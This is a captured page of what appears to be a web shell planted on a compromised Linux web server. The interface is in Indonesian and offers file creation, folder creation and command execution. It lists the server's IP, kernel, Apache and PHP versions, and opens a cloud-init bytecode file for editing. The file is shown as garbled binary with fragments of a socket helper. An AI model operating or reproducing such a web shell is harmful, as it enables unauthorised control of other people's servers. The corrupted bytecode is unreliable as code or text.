One Hat Cyber Team
Your IP :
10.30.1.1
Server IP :
103.148.201.5
Server :
Linux web-olt 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
Server Software :
Apache/2.4.52 (Ubuntu)
PHP Version :
8.1.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python3
/
dist-packages
/
cloudinit
/
__pycache__
/
Edit File:
socket.cpython-310.pyc
o x[h� � @ sr d Z ddlZddlZddlZddlZddlmZ ddlmZ ddl m Z e�e�Z defdd�ZG d d � d �ZdS )z#A module for common socket helpers.� N)�suppress)�performance)�DEFAULT_RUN_DIR�messagec C s� t j�dd�}|sdS |d dkr|�ddd� n |d dkr#td ��t�tjtjtjB ��}t � d t| �� |�|� |� | �d�� W d � dS 1 sOw Y dS )z[Send a sd_notify message. :param message: sd-notify message (must be valid ascii) � NOTIFY_SOCKET� Nr �@� � �/zUnsupported socket typezSending sd_notify(%s)�ascii)�os�environ�get�replace�OSError�socket�AF_UNIX� SOCK_DGRAM�SOCK_CLOEXEC�LOG�info�str�connect�sendall�encode)r �socket_path�sock� r �2/usr/lib/python3/dist-packages/cloudinit/socket.py� sd_notify s � "�r c @ s<